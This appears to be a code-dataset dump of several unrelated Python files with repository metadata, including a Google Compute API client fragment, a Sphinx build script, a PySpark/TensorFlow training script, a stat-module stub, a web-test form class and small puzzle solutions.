global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field=u'vpnTunnel',
request_type_name=u'ComputeVpnTunnelsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of VpnTunnel resources contained in the specified project and region.
Args:
request: (ComputeVpnTunnelsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsListRequest',
response_type_name=u'VpnTunnelList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a VpnTunnel. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeVpnTunnelsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeVpnTunnelsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeVpnTunnelsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.vpnTunnels.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeVpnTunnelsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class ZoneOperationsService(base_api.BaseApiService):
"""Service class for the zoneOperations resource."""
_NAME = u'zoneOperations'
def __init__(self, client):
super(ComputeBeta.ZoneOperationsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeZoneOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.zoneOperations.delete',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsDeleteRequest',
response_type_name=u'ComputeZoneOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified zone-specific Operations resource.
Args:
request: (ComputeZoneOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.get',
ordered_params=[u'project', u'zone', u'operation'],
path_params=[u'operation', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/operations/{operation}',
request_field='',
request_type_name=u'ComputeZoneOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified zone.
Args:
request: (ComputeZoneOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zoneOperations.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/operations',
request_field='',
request_type_name=u'ComputeZoneOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class ZonesService(base_api.BaseApiService):
"""Service class for the zones resource."""
_NAME = u'zones'
def __init__(self, client):
super(ComputeBeta.ZonesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified Zone resource. Get a list of available zones by making a list() request.
Args:
request: (ComputeZonesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Zone) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.get',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}',
request_field='',
request_type_name=u'ComputeZonesGetRequest',
response_type_name=u'Zone',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Zone resources available to the specified project.
Args:
request: (ComputeZonesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ZoneList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.zones.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones',
request_field='',
request_type_name=u'ComputeZonesListRequest',
response_type_name=u'ZoneList',
supports_download=False,
)
| [
"saneetk@packtpub.com"
] | saneetk@packtpub.com |
bff6d26590f067bd15ad04ee687e8f3bf1027a7a | 6d6d82ce7835fd8fca1aa12f775a75f4d7901f0f | /makedoc.py | 1e2c1ef75b934eb9702f4faf493c766702d71fb0 | [
"Apache-2.0"
] | permissive | shmakovpn/whatprovides | b7a3867f0529d465a8405f6669b797a5c7de2e2c | 69aab055397ae49844c93cfe17fdfaf18b02f79d | refs/heads/master | 2023-02-12T00:39:28.936096 | 2021-01-14T08:26:25 | 2021-01-14T08:26:25 | 273,847,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | """
whatprovides makedoc.py
This script runs 'shpinx-build -b html docs/source docs/build/html'
"""
import os
SCRIPT_DIR: str = os.path.dirname(os.path.abspath(__file__))
def run_sphinx():
docs_dir: str = os.path.join(SCRIPT_DIR, 'docs')
docs_source_dir: str = os.path.join(docs_dir, 'source')
build_dir: str = os.path.join(docs_dir, 'build')
html_dir: str = os.path.join(build_dir, 'html')
os.system('sphinx-build -b html "%s" "%s"' % (docs_source_dir, html_dir))
print('__END__')
if __name__ == '__main__':
run_sphinx()
| [
"shmakovpn@yandex.ru"
] | shmakovpn@yandex.ru |
e1b9563a9df155f936dd790955394eb6f63dea35 | 7f73a273b5c55ccbb506c4b7069132555389d11c | /.idea/spark-warehouse/spark-streaming/bank_2017_11_25/ekf_model.py | 0c89de7afc02fbee1fb24eff394646ec4195d168 | [] | no_license | lfforai/zd_project | a8d5e278aeaa2709f798a1cdc16457762d2498d0 | 751c66c395520989a36a6ec272f7e9ce5c2d8c08 | refs/heads/master | 2021-09-09T12:55:16.917968 | 2018-03-16T09:44:51 | 2018-03-16T09:44:51 | 108,788,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,001 | py | #///////////////////////////////////////////////////////////////////////////////////////
#./spark-submit --conf spark.executorEnv.LD_LIBRARY_PATH="${JAVA_HOME}/jre/lib/amd64/server:/usr/local/cuda-8.0/lib64" --conf spark.executorEnv.CLASSPATH="$($HADOOP_HOME/bin/hadoop classpath --glob):${CLASSPATH}" --conf spark.executorEnv.HADOOP_HDFS_HOME="/tool_lf/hadoop/hadoop-2.7.4" ~/IdeaProjects/pyspark_t/.idea/spark-warehouse/spark-streaming/exp.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
#
from pyspark.context import SparkContext
from pyspark.conf import SparkConf
from hdfs import *
client_N = Client("http://127.0.0.1:50070")
import argparse
import os
import numpy
import sys
import tensorflow as tf
import threading
import time
import ekf_model_mapfunc
from datetime import datetime
from tensorflowonspark import TFCluster
from tensorflow.contrib.timeseries.python.timeseries import NumpyReader
# import pyspark.sql as sql_n #spark.sql
# from pyspark import SparkContext # pyspark.SparkContext dd
# from pyspark.conf import SparkConf #conf
os.environ['JAVA_HOME'] = "/tool_lf/java/jdk1.8.0_144/bin/java"
os.environ["PYSPARK_PYTHON"] = "/root/anaconda3/bin/python"
os.environ["HADOOP_USER_NAME"] = "root"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["spark.executorEnv.LD_LIBRARY_PATH"]="${JAVA_HOME}/jre/lib/amd64/server:/usr/local/cuda-8.0/lib64"
os.environ["spark.executorEnv.CLASSPATH"]="$($HADOOP_HOME/bin/hadoop classpath --glob):${CLASSPATH}"
os.environ["spark.executorEnv.HADOOP_HDFS_HOME"]="/tool_lf/hadoop/hadoop-2.7.4"
conf=SparkConf().setMaster("spark://titianx:7077")
sc=SparkContext(conf=conf)
# spark = sql_n.SparkSession.builder.appName("lf").config(conf=conf).getOrCreate()
# sc =spark.sparkContext
# sqlContext=sql_n.SQLContext(sparkContext=sc,sparkSession=spark)
executors = sc._conf.get("spark.executor.instances")
print("executors:=",executors)
num_executors = int(executors) if executors is not None else 4
num_ps = 0
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--batch_size", help="number of records per batch", type=int, default=10000)
parser.add_argument("-e", "--epochs", help="number of epochs", type=int, default=1)
# parser.add_argument("-f", "--format", help="example format: (csv|pickle|tfr)", choices=["csv","pickle","tfr"], default="csv")
# parser.add_argument("-i", "--images", help="HDFS path to MNIST images in parallelized format")
# parser.add_argument("-l", "--labels", help="HDFS path to MNIST labels in parallelized format")
parser.add_argument("-m", "--model", help="HDFS path to save/load model during train/inference", default="ekf_model")
parser.add_argument("-n", "--cluster_size", help="number of nodes in the cluster", type=int, default=num_executors)
parser.add_argument("-o", "--output", help="HDFS path to save test/inference output", default="predictions")
parser.add_argument("-r", "--readers", help="number of reader/enqueue threads", type=int, default=4)
parser.add_argument("-s", "--steps", help="maximum number of steps", type=int, default=2)
parser.add_argument("-tb", "--tensorboard", help="launch tensorboard process", action="store_true")
parser.add_argument("-X", "--mode", help="train|inference", default="train")
parser.add_argument("-c", "--rdma", help="use rdma connection", default=False)
args = parser.parse_args()
#删除存储模型参数用目录
if client_N.list("/user/root/").__contains__("model") and args.mode=='train':
client_N.delete("/user/root/model/",recursive=True)
print("args:",args)
print("{0} ===== Start".format(datetime.now().isoformat()))
def sample_map(fraction_base,rato):
def _sample_map(iter):
while True:
fraction_use=random.random()
if fraction_use-rato<0.10 and fraction_use-rato>-0.10:
break
input_length=int(fraction_base*fraction_use)
rezult=[]
num=0
# start=random.random()*1000
for i in iter:
if num<input_length and 240<num:
rezult.append(i)
else:
if num>input_length:
break
num=num+1
return rezult
return _sample_map
# dataRDD1_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(1,float(x[1]))).count()
# dataRDD2_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(2,float(x[1]))).count()
# dataRDD3_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(3,float(x[1]))).count()
# dataRDD4_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(4,float(x[1]))).count()
# dataRDD5_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(5,float(x[1]))).count()
# dataRDD6_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(6,float(x[1]))).count()
# dataRDD7_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(7,float(x[1]))).count()
# dataRDD8_count=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(8,float(x[1]))).count()
fraction_base,rato=5000,0.75
dataRDD1=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt")\
.map(lambda x:str(x).split(",")).map(lambda x:("34FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD2=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("35FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD3=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("39FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
dataRDD4=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
.map(lambda x:str(x).split(",")).map(lambda x:("41FS",float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD5=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_034FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(5,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD6=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_035FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(6,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD7=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_039FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(7,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
# dataRDD8=sc.textFile("hdfs://127.0.0.1:9000/zd_data2/FS/G_CFYH_2_041FS001.txt") \
# .map(lambda x:str(x).split(",")).map(lambda x:(8,float(x[1]))).mapPartitions(sample_map(fraction_base,rato)).repartition(1)
a=[dataRDD1,dataRDD2,dataRDD3,dataRDD4]
#,dataRDD5,dataRDD6,dataRDD7,dataRDD8]
dataRDD=sc.union(a)
print(dataRDD.take(100))
rdd_count=dataRDD.count()
print("count:====================",rdd_count)
print("partition:=",dataRDD.getNumPartitions())
# def func(x,iter):
# result = []
# for value in iter:
# result.append((x,value))
# return result
# dataRDD=sc.parallelize(range(150003),3).mapPartitionsWithIndex(func)
# print(dataRDD.take(100))
if rdd_count<1000:
args.epochs=2
args.batch_size=1000
else:
args.epochs=1
args.batch_size=1000
# print("getNumPartitions:=",dataRDD.getNumPartitions())
cluster = TFCluster.run(sc, ekf_model_mapfunc.map_fun, args, args.cluster_size, num_ps, args.tensorboard, TFCluster.InputMode.SPARK)
# if args.mode == "train":
cluster.train(dataRDD, args.epochs)
cluster.shutdown()
print("-----------------train over-------------------------------")
# # else:
def func1(iter):
result = []
num=0
for value in iter:
result.append(value)
num=num+1
if num>2400:
break
return result
dataRDD1=sc.union(a).mapPartitions(func1)
# dataRDD1=sc.parallelize(range(600),3).mapPartitionsWithIndex(func)
# print("getNumPartitions:=",dataRDD1.getNumPartitions())
args.mode='inference'
args.batch_size=300
args.epochs=1
args.steps=1
print(args.mode)
cluster1 = TFCluster.run(sc, ekf_model_mapfunc.map_fun, args, args.cluster_size, num_ps, args.tensorboard, TFCluster.InputMode.SPARK)
labelRDD = cluster1.inference(dataRDD1)
print(labelRDD.filter(lambda x:not str(x[0]).__eq__('o')).collect())# .saveAsTextFile(args.output)
cluster1.shutdown()
print("-----------------inference over-------------------------------")
print("{0} ===== Stop".format(datetime.now().isoformat())) | [
"18073072@qq.com"
] | 18073072@qq.com |
1f0527954e2232a1b08f61294ae822a4c8c0d7b8 | ae43c148e114d66a11fe79cf39dba5aa8541adc1 | /stubs.v4/s3IPekUedU5U8YgCOUPVRVr52psgnm_uIGZdlwqu2-A=/python._stat.pyi | e646547adc91d472e0c8e976bf8925f9232137f5 | [] | no_license | css20090922/linebot | c5561ae498dd82efcdd42fedd09f542d6b3f2bae | 389e91e972ed115f64352f56537e0efa6dd8d690 | refs/heads/master | 2023-06-27T01:02:06.174093 | 2021-03-04T03:34:45 | 2021-03-04T03:34:45 | 244,527,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,289 | pyi | FILE_ATTRIBUTE_ARCHIVE = 32
FILE_ATTRIBUTE_COMPRESSED = 2048
FILE_ATTRIBUTE_DEVICE = 64
FILE_ATTRIBUTE_DIRECTORY = 16
FILE_ATTRIBUTE_ENCRYPTED = 16384
FILE_ATTRIBUTE_HIDDEN = 2
FILE_ATTRIBUTE_INTEGRITY_STREAM = 32768
FILE_ATTRIBUTE_NORMAL = 128
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192
FILE_ATTRIBUTE_NO_SCRUB_DATA = 131072
FILE_ATTRIBUTE_OFFLINE = 4096
FILE_ATTRIBUTE_READONLY = 1
FILE_ATTRIBUTE_REPARSE_POINT = 1024
FILE_ATTRIBUTE_SPARSE_FILE = 512
FILE_ATTRIBUTE_SYSTEM = 4
FILE_ATTRIBUTE_TEMPORARY = 256
FILE_ATTRIBUTE_VIRTUAL = 65536
SF_APPEND = 262144
SF_ARCHIVED = 65536
SF_IMMUTABLE = 131072
SF_NOUNLINK = 1048576
SF_SNAPSHOT = 2097152
ST_ATIME = 7
ST_CTIME = 9
ST_DEV = 2
ST_GID = 5
ST_INO = 1
ST_MODE = 0
ST_MTIME = 8
ST_NLINK = 3
ST_SIZE = 6
ST_UID = 4
S_ENFMT = 1024
S_IEXEC = 64
S_IFBLK = 24576
S_IFCHR = 8192
S_IFDIR = 16384
S_IFDOOR = 0
S_IFIFO = 4096
S_IFLNK = 40960
def S_IFMT():
"Return the portion of the file's mode that describes the file type."
pass
S_IFPORT = 0
S_IFREG = 32768
S_IFSOCK = 49152
S_IFWHT = 0
def S_IMODE():
"Return the portion of the file's mode that can be set by os.chmod()."
pass
S_IREAD = 256
S_IRGRP = 32
S_IROTH = 4
S_IRUSR = 256
S_IRWXG = 56
S_IRWXO = 7
S_IRWXU = 448
def S_ISBLK(mode):
'S_ISBLK(mode) -> bool\n\nReturn True if mode is from a block special device file.'
return True
def S_ISCHR(mode):
'S_ISCHR(mode) -> bool\n\nReturn True if mode is from a character special device file.'
return True
def S_ISDIR(mode):
'S_ISDIR(mode) -> bool\n\nReturn True if mode is from a directory.'
return True
def S_ISDOOR(mode):
'S_ISDOOR(mode) -> bool\n\nReturn True if mode is from a door.'
return True
def S_ISFIFO(mode):
'S_ISFIFO(mode) -> bool\n\nReturn True if mode is from a FIFO (named pipe).'
return True
S_ISGID = 1024
def S_ISLNK(mode):
'S_ISLNK(mode) -> bool\n\nReturn True if mode is from a symbolic link.'
return True
def S_ISPORT(mode):
'S_ISPORT(mode) -> bool\n\nReturn True if mode is from an event port.'
return True
def S_ISREG(mode):
'S_ISREG(mode) -> bool\n\nReturn True if mode is from a regular file.'
return True
def S_ISSOCK(mode):
'S_ISSOCK(mode) -> bool\n\nReturn True if mode is from a socket.'
return True
S_ISUID = 2048
S_ISVTX = 512
def S_ISWHT(mode):
'S_ISWHT(mode) -> bool\n\nReturn True if mode is from a whiteout.'
return True
S_IWGRP = 16
S_IWOTH = 2
S_IWRITE = 128
S_IWUSR = 128
S_IXGRP = 8
S_IXOTH = 1
S_IXUSR = 64
UF_APPEND = 4
UF_COMPRESSED = 32
UF_HIDDEN = 32768
UF_IMMUTABLE = 2
UF_NODUMP = 1
UF_NOUNLINK = 16
UF_OPAQUE = 8
__doc__ = 'S_IFMT_: file type bits\nS_IFDIR: directory\nS_IFCHR: character device\nS_IFBLK: block device\nS_IFREG: regular file\nS_IFIFO: fifo (named pipe)\nS_IFLNK: symbolic link\nS_IFSOCK: socket file\nS_IFDOOR: door\nS_IFPORT: event port\nS_IFWHT: whiteout\n\nS_ISUID: set UID bit\nS_ISGID: set GID bit\nS_ENFMT: file locking enforcement\nS_ISVTX: sticky bit\nS_IREAD: Unix V7 synonym for S_IRUSR\nS_IWRITE: Unix V7 synonym for S_IWUSR\nS_IEXEC: Unix V7 synonym for S_IXUSR\nS_IRWXU: mask for owner permissions\nS_IRUSR: read by owner\nS_IWUSR: write by owner\nS_IXUSR: execute by owner\nS_IRWXG: mask for group permissions\nS_IRGRP: read by group\nS_IWGRP: write by group\nS_IXGRP: execute by group\nS_IRWXO: mask for others (not in group) permissions\nS_IROTH: read by others\nS_IWOTH: write by others\nS_IXOTH: execute by others\n\nUF_NODUMP: do not dump file\nUF_IMMUTABLE: file may not be changed\nUF_APPEND: file may only be appended to\nUF_OPAQUE: directory is opaque when viewed through a union stack\nUF_NOUNLINK: file may not be renamed or deleted\nUF_COMPRESSED: OS X: file is hfs-compressed\nUF_HIDDEN: OS X: file should not be displayed\nSF_ARCHIVED: file may be archived\nSF_IMMUTABLE: file may not be changed\nSF_APPEND: file may only be appended to\nSF_NOUNLINK: file may not be renamed or deleted\nSF_SNAPSHOT: file is a snapshot file\n\nST_MODE\nST_INO\nST_DEV\nST_NLINK\nST_UID\nST_GID\nST_SIZE\nST_ATIME\nST_MTIME\nST_CTIME\n\nFILE_ATTRIBUTE_*: Windows file attribute constants\n (only present on Windows)\n'
__name__ = '_stat'
__package__ = ''
def filemode():
"Convert a file's mode to a string of the form '-rwxrwxrwx'"
pass
| [
"edward19990329@gmail.com"
] | edward19990329@gmail.com |
4cf780028fed950bf6c53ed63ac5f5459dfcb2bd | 1fccf52e0a694ec03aac55e42795487a69ef1bd4 | /src/euler_python_package/euler_python/medium/p167.py | 07df025620b7d9aa7d16a09fa14634cac511e29d | [
"MIT"
] | permissive | wilsonify/euler | 3b7e742b520ee3980e54e523a018cd77f7246123 | 5214b776175e6d76a7c6d8915d0e062d189d9b79 | refs/heads/master | 2020-05-27T12:15:50.417469 | 2019-09-14T22:42:35 | 2019-09-14T22:42:35 | 188,614,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27 | py | def problem167():
pass
| [
"tom.andrew.wilson@gmail.com"
] | tom.andrew.wilson@gmail.com |
18d7e89c4ff3ab5e1f4886895111d3e359f7a99a | 0466559817d3a1be9409da2c83db99c4db3bacfe | /hubcheck/pageobjects/widgets/tools_status_approve_license_form.py | 7c7e4da3883a72ce8d045d1ce61dc77718770acd | [
"MIT"
] | permissive | ken2190/hubcheck | 955cf9b75a1ee77e28256dfd3a780cfbc17de961 | 2ff506eb56ba00f035300862f8848e4168452a17 | refs/heads/master | 2023-03-20T15:17:12.949715 | 2015-09-29T16:11:18 | 2015-09-29T16:11:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | from hubcheck.pageobjects.widgets.form_base import FormBase
from hubcheck.pageobjects.basepageelement import Button
from hubcheck.pageobjects.basepageelement import Checkbox
from hubcheck.pageobjects.basepageelement import Select
from hubcheck.pageobjects.basepageelement import TextArea
class ToolsStatusApproveLicenseForm(FormBase):
def __init__(self, owner, locatordict={}):
super(ToolsStatusApproveLicenseForm,self).__init__(owner,locatordict)
# load hub's classes
ToolsStatusApproveLicenseForm_Locators = \
self.load_class('ToolsStatusApproveLicenseForm_Locators')
# update this object's locator
self.locators.update(ToolsStatusApproveLicenseForm_Locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.sourceaccess = Select(self,{'base':'access'})
self.templates = Select(self,{'base':'templates'})
self.licensetext = TextArea(self,{'base':'license'})
self.reason = TextArea(self,{'base':'reason'})
self.authorize = Checkbox(self,{'base':'authorize'})
self.fields = ['sourceaccess','templates','licensetext','reason','authorize']
# update the component's locators with this objects overrides
self._updateLocators()
class ToolsStatusApproveLicenseForm_Locators_Base(object):
"""locators for ToolsStatusApproveLicenseForm object"""
locators = {
'base' : "css=#licenseForm",
'access' : "css=#t_code",
'templates' : "css=#templates",
'license' : "css=#license",
'reason' : "css=#reason",
'authorize' : "css=#field-authorize",
'submit' : "css=#licenseForm [type='submit']",
}
| [
"telldsk@gmail.com"
] | telldsk@gmail.com |
5bd122562edd702b509be8347cb903fabd7a348c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02622/s965763591.py | 6eb619ddc1792d0336e698e3556c81de57f06d66 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | s = input()
t = input()
ans = abs(len(s) - len(t))
count = min(len(s), len(t))
for i in range(count):
if s[i] != t [i]:
ans += 1
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
450964e2ca1c9a822fb9063c290bf73249f962dc | b72dbc51279d3e59cb6410367b671f8a956314c1 | /leet_code/leet_289_미완.py | af573016d838cdf5fed6d1582fe7f3571eef673e | [] | no_license | ddobokki/coding-test-practice | 7b16d20403bb1714d97adfd1f47aa7d3ccd7ea4b | c88d981a1d43b986169f7884ff3ef1498e768fc8 | refs/heads/main | 2023-07-08T15:09:32.269059 | 2021-08-08T12:19:44 | 2021-08-08T12:19:44 | 344,116,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | class Solution:
def wordPattern(self, pattern: str, s: str) -> bool:
p_to_s = {}
s_to_p = {}
s_list = s.split()
if len(pattern) != len(s_list):
return False
for i in range(len(pattern)):
if not pattern[i] in p_to_s:
p_to_s[pattern[i]] = s_list[i]
else:
if p_to_s[pattern[i]] != s_list[i]:
return False
if not s_list[i] in s_to_p:
s_to_p[s_list[i]] = pattern[i]
else:
if s_to_p[s_list[i]] != pattern[i]:
return False
return True
print(Solution().wordPattern(pattern = "abba", s = "dog cat cat dog"))
print(Solution().wordPattern(pattern = "aaaa", s = "dog cat cat dog"))
print(Solution().wordPattern(pattern = "abba", s = "dog cat cat fish"))
print(Solution().wordPattern(pattern = "abba", s = "dog dog dog dog")) | [
"44228269+ddobokki@users.noreply.github.com"
] | 44228269+ddobokki@users.noreply.github.com |
43dc21afee9084e1dac7059070a15dba3c140d9b | 8c5c4102b1c0f54ceeaa67188532f72c7e269bab | /ucr_adiac.py | 9d23e9782528db8910955949b3d7e0c9ed82de5a | [
"MIT"
] | permissive | stjordanis/dtw-numba | a6d3e745e005b0bc8026d973f33668931bbde9f2 | d8bc9e1f0cde108e429ff72e654ed8aa10a6b4ae | refs/heads/master | 2022-01-04T16:59:26.423994 | 2019-01-14T01:45:11 | 2019-01-14T01:45:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | from utils.data_loader import load_dataset
from odtw import KnnDTW
X_train, y_train, X_test, y_test = load_dataset('adiac', normalize_timeseries=True)
print()
# parameters
num_neighbours = 1
model = KnnDTW(num_neighbours)
# fit to the dataset
model.fit(X_train, y_train)
# Predict / Evaluate the score
accuracy = model.evaluate(X_test, y_test)
error = 1. - accuracy
print("*" * 20, "\n")
print("Test Accuracy :", accuracy)
print("Test Error :", error) | [
"titu1994@gmail.com"
] | titu1994@gmail.com |
a3fad2f7d00ea5094ccd316d80677c52d5b80656 | 61efd764ae4586b6b2ee5e6e2c255079e2b01cfc | /azure-mgmt-network/azure/mgmt/network/v2017_10_01/models/application_gateway_frontend_ip_configuration.py | 955d0ad0ccdd29a9286612911582c511c7937114 | [
"MIT"
] | permissive | AutorestCI/azure-sdk-for-python | a3642f53b5bf79d1dbb77851ec56f4cc0c5b3b61 | 60b0726619ce9d7baca41f6cd38f741d74c4e54a | refs/heads/master | 2021-01-21T02:23:59.207091 | 2018-01-31T21:31:27 | 2018-01-31T21:31:27 | 55,251,306 | 4 | 3 | null | 2017-11-13T17:57:46 | 2016-04-01T17:48:48 | Python | UTF-8 | Python | false | false | 3,079 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
